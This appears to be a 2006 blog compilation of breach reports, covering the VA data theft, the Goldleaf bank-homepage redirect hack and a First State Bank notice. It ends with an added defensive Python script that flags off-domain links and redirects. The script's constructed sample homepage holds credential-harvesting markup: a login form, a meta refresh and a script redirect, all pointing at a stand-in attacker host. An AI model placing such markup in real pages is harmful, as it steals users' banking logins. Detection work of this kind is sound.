INTEREST: how at risk is your personal data?

Many of the security breaches exposing personal information stored on computers happen in the United States - at least that's how it seems from media reports. The most recent of these reports concerns the possible exposure of information on over 25,000,000 American veterans discharged since 1975, including names, Social Security numbers and dates of birth, which was stolen from a VA employee's home.
Here's a quick overview of this month's "State of the Exposure"...
...from: http://www.privacyrights.org/ar/ChronDataBreaches.htm
A list of security breaches exposing individuals' information, starting with the ChoicePoint incident near the beginning of 2005:
The data breaches noted [on this page] have been reported because the personal information compromised includes data elements useful to identity thieves, such as Social Security numbers, account numbers, and driver's license numbers. A few breaches that do NOT expose such sensitive information have been included in order to underscore the variety and frequency of data breaches. However, we have not included the number of individuals affected in such breaches in the total because we want this compilation to reflect breaches that expose individuals to identity theft as well as breaches that qualify for disclosure under state laws.
[...]
May 22, 2006 Dept. of Veterans Affairs (Washington, DC)
Data of all (26,500,000) American veterans who were discharged since 1975 including names, Social Security numbers and dates of birth was stolen from a VA employee's home. The employee was not authorized to take the files home to work on a data collation project. The data did not contain medical or financial information, but may have disability numerical rankings.
================= ...from: http://blogs.zdnet.com/Ou/index.php?p=238
June 1, 2006 300+ Bank homepages hacked and redirected Posted by George Ou @ 12:11 am
Goldleaf Technologies, a unit of Goldleaf Financial Solutions, Inc. which provides homepage services for financial institutions and banks, had one of its servers hacked last Thursday, May 25th. I was initially alerted to this by a concerned customer who received an email notice from his bank that ALL customer passwords had been reset to their default password. Several news outlets covered the story by merely posting the Goldleaf official press release verbatim, which characterized the breach as a "phishing incident", so the details were initially murky.
The AP Wire was one of the few that characterized the incident as a security breach, and it quoted a Goldleaf spokesperson as saying that 150 to 175 sites were affected. When I asked Goldleaf's spokesperson, he characterized the AP information as wrong and told me that a little more than half of the 600 hosted bank sites were modified to redirect traffic, which puts the total number of banks affected at over 300. The homepages of those banks were modified so that they would direct all online banking traffic to a malicious site in Madrid, Spain to collect login credentials from unsuspecting customers.
[...]
In Goldleaf's defense, their security administrators noticed and stopped the malicious activity within 90 minutes of the initial compromise and they immediately notified the authorities and all of the banks that they were hosting.
[...]
================ ...from: http://blogs.zdnet.com/BTL/?p=3128&tag=nl.e622
June 1, 2006 Massive, under-reported online banking breach raises serious disclosure and remedy questions Posted by David Berlind @ 11:57 am
[...]
The disclosure that has so far followed leaves much to be desired. According to a press release from GoldLeaf (one that was regurgitated word-for-word by news outlets such as Forbes under the heading of news and analysis):
Goldleaf Chief Executive Officer, Lynn Boggs, said, "We have identified and corrected the problem. We have fully restored our Web site, remote deposit and ACH services. In addition to contacting our customers, we have communicated with our vendor partners, regulators and law enforcement authorities. We are fully operational and will remain diligent in our security efforts."
What exactly was communicated isn't known. What we do know is that most of the information that has so far been made public is at best misleading and at worst reeks of spin control. The problem starts with the press release's headline, which reads Goldleaf Technologies Responds to Phishing Attempt. That's an interesting choice of words to describe what happened here. If it was a phishing attempt, Goldleaf could easily escape any blame by deferring some of it to insecure client software (emails, browsers, etc.) and the rest to a lack of best practices on the end user's behalf. Phishing is a form of email-based social engineering that dupes users into clicking on links (in email) that they wouldn't otherwise click on.
eBay is a frequent target of phishers. Even when such phishing attempts are successful, it's hardly eBay's fault. Neither email nor phishing played a role in this exploit. End users were not social engineered. They entered their credentials as they normally would, into Web pages that were served from the domains they should have been served from. At the very least, Goldleaf needs to redisclose so that (a) it's absolutely clear that its services were hacked and (b) phishing played no role in this attack.
[...]
Some banks, the ones we know of, notified their customers by both regular mail and email. First State Bank, one of the affected banks, sent two separate notices. The first one, signed by First State E-Banking officer Christa Walton, has the audacity to include a link that points people to a remedy Web page that isn't even within First State's domain: an absolute no-no that is exactly the same trick used by phishers. Says that first email:
...In an effort to ensure that all customers are aware, this same communication was mailed via US Postal Service. If, at receipt of this mailed communication, you have already obtained access to your accounts through our new Online Banking site, located at <URL masked by ZDNet>, there is no need to take any further action...
[...]
...a second mailing reads: ...On Thursday, May 25, 2006, First State Bank became aware of an apparent attempt by an unauthorized party to gain access to our third-party website host and thus to our Online Banking site...Although there is no current evidence that customers' information has been accessed, this incident may have increased the probability of your information being used for fraudulent purposes...Your Online Banking password has been defaulted back to your original password; when you established your Online Banking service...you may not have access to your original login information, First State Bank has established a help center that you may contact at 1-800-527-6335 or by email at info@first-state.net...A temporary Online Banking login website has been established at <URL masked by ZDNet>. This temporary site is safe...
===================== ...from: http://www.wired.com/news/politics/privacy/0,70804-0.html
Microsoft Is Pushing for Privacy? By Kevin Poulsen, 12:30 PM May 03, 2006
[...]
"The states have enacted a flurry of legislation [for privacy legislation], a flurry of action," said Daniel Solove, an associate professor at the George Washington University Law School. "Industry is scared because the states are actually doing something."
The main prong of the state approach was pioneered by California's anti-identity-theft statute, SB1386, which requires companies to warn consumers of a data breach in which their information "is reasonably believed to have been acquired by an unauthorized person."
Microsoft prefers that customers be notified only when a company determines there's a "reasonable risk of a material harm happening to a consumer," said Hintze. "If the trigger is too low ... people will get notice fatigue. People will get notices all the time."
Solove argues that regardless of the language, codifying an inflexible federal standard that overpowers any state laws would be bad for consumers. "I think we're going to see a kind of net loss for privacy protection."
[...]
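The two ZDNet pieces above describe the same observable from opposite sides: in the Goldleaf case, hosted bank homepages were edited so that login traffic went to a host outside the bank's domain, and in the First State notice, the bank itself sent customers a "remedy" link outside its own domain, which is exactly what a phisher's mail looks like. A hosting provider checking its customers' pages, or a customer checking a notification before clicking, wants one test: does any navigation, form-submission or redirect target leave the domain the page or message belongs to? The following Python is an added example, not code from the original post, from ZDNet, Goldleaf, or any bank. It pulls link targets, form actions, meta-refresh and script redirects out of HTML and reports those whose domain differs from the expected one. The sample homepage and notice it runs on are constructed (all hosts are under .example), and the registrable-domain helper assumes plain two-label domains rather than consulting a public-suffix list.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes whose values name a place the browser will send the user or the
# user's form data.  Any of these pointing outside the expected domain is the
# pattern the modified Goldleaf homepages and the First State notice share.
TARGET_ATTRS = {"a": "href", "form": "action", "iframe": "src", "script": "src"}

# Absolute URLs embedded in inline script, e.g. window.location = "https://...".
_URL_IN_SCRIPT = re.compile(r'https?://[^\s"\'<>]+')


def registrable_domain(host: str) -> str:
    """Reduce a hostname to its last two labels: 'www.bank.example' -> 'bank.example'.
    Assumption: no public-suffix list, so suffixes such as .co.uk would need a
    real PSL before this is used in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


class _TargetCollector(HTMLParser):
    """Collect (kind, url) pairs for every navigation or submission target."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._script = None  # buffer for the body of the <script> being read

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in TARGET_ATTRS and attrs.get(TARGET_ATTRS[tag]):
            self.targets.append((tag, attrs[TARGET_ATTRS[tag]]))
        # <meta http-equiv="refresh" content="5;URL=https://..."> is a redirect too.
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            content = attrs.get("content") or ""
            pos = content.lower().find("url=")
            if pos != -1:
                self.targets.append(("meta-refresh", content[pos + 4:].strip().strip("'\"")))
        if tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            for url in _URL_IN_SCRIPT.findall("".join(self._script)):
                self.targets.append(("script", url))
            self._script = None


def off_domain_targets(html: str, expected_host: str) -> list:
    """Return every (kind, url) in `html` whose registrable domain differs from
    that of `expected_host`.  Relative URLs stay on-domain and are not reported."""
    parser = _TargetCollector()
    parser.feed(html)
    parser.close()
    expected = registrable_domain(expected_host)
    hits = []
    for kind, url in parser.targets:
        host = urlparse(url).hostname
        if host and registrable_domain(host) != expected:
            hits.append((kind, url))
    return hits


# Constructed sample: a hosted bank homepage whose login form, a meta refresh
# and an injected script all point at an attacker-controlled host, alongside
# legitimate relative links that must not be flagged.
SAMPLE_HOMEPAGE = """
<html><head>
<meta http-equiv="refresh" content="5;URL=https://login.attacker.example/ib/">
<script>if (location.pathname == "/online-banking") { window.location = "https://login.attacker.example/ib/"; }</script>
</head><body>
<a href="/about">About us</a>
<form action="https://login.attacker.example/ib/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<form action="/contact" method="post"><input name="msg"></form>
</body></html>
"""

# Constructed sample: a breach notification whose "temporary site" link leaves
# the bank's domain (the First State pattern) next to one that stays on it.
SAMPLE_NOTICE = """
<p>Your Online Banking password has been reset.</p>
<p>Log in at our <a href="https://secure.hosting-vendor.example/firststate/login">temporary site</a>
or visit <a href="https://www.first-state.example/help">our help page</a>.</p>
"""

if __name__ == "__main__":
    for kind, url in off_domain_targets(SAMPLE_HOMEPAGE, "www.bank.example"):
        print("homepage: off-domain", kind, "->", url)
    for kind, url in off_domain_targets(SAMPLE_NOTICE, "www.first-state.example"):
        print("notice: off-domain", kind, "->", url)
```

Run against a live site, the homepage check is what a provider in Goldleaf's position would schedule against every hosted page, diffing the result against a known-good baseline so that any new off-domain form action or redirect raises an alert; the 90-minute detection window described above is what such a check is meant to shrink. The notice check is the customer-side mirror: a bank's mail that trips it is indistinguishable from phishing by this test, which is the point Berlind makes about the First State email.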